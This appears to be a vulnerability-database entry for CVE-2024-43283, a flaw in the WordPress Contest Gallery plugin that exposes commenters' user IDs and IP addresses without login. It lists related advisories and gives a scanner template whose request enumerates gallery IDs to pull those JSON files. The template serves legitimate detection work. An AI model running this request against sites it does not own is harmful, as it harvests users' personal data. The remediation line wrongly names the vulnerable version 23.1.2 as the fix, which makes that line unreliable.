| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-43283 | 26 Aug 202418:49 | – | circl | |
| WordPress plugin Contest Gallery 信息泄露漏洞 | 26 Aug 202400:00 | – | cnnvd | |
| CVE-2024-43283 | 26 Aug 202416:07 | – | cve | |
| CVE-2024-43283 WordPress Contest Gallery plugin <= 23.1.2 - Unauthenticated Comment UserID And IP address Disclosure vulnerability | 26 Aug 202416:07 | – | cvelist | |
| EUVD-2024-40175 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-43283 | 26 Aug 202416:15 | – | nvd | |
| CVE-2024-43283 | 26 Aug 202416:15 | – | osv | |
| WordPress Contest Gallery plugin <= 23.1.2 - Unauthenticated Comment UserID And IP address Disclosure vulnerability | 16 Aug 202410:06 | – | patchstack | |
| WordPress Contest Gallery Plugin <= 23.1.2 is vulnerable to Sensitive Data Exposure | 16 Aug 202400:00 | – | patchstack | |
| PT-2024-30448 | 26 Aug 202400:00 | – | ptsecurity |
id: CVE-2024-43283
info:
name: Contest Gallery - Broken Access Control
author: popcorn94
severity: medium
description: |
Contest Gallery from n/a through 23.1.2 contains an exposure of sensitive information to an unauthorized actor caused by insufficient access controls, letting attackers access sensitive data, exploit requires no specific conditions.
impact: |
Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data.
remediation: |
Update to the latest version 23.1.2 or later to address the issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
- https://nvd.nist.gov/vuln/detail/CVE-2024-43283
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-43283
epss-score: 0.01104
epss-percentile: 0.61787
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure,vkev
http:
- raw:
- |
GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
Host: {{Hostname}}
payloads:
path: helpers/wordlists/numbers.txt
attack: batteringram
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WpUserId":'
- 'userIP":'
condition: and
case-insensitive: true
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502207b667d9bb92ea1e186b912d57630be909ee39c7d9ddc4c9953d0a42192b1b0e6022100aaa08f41e6d5f5dd9a52d569e35423024ce886f34bc87719fb93c25ff54f4a2a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation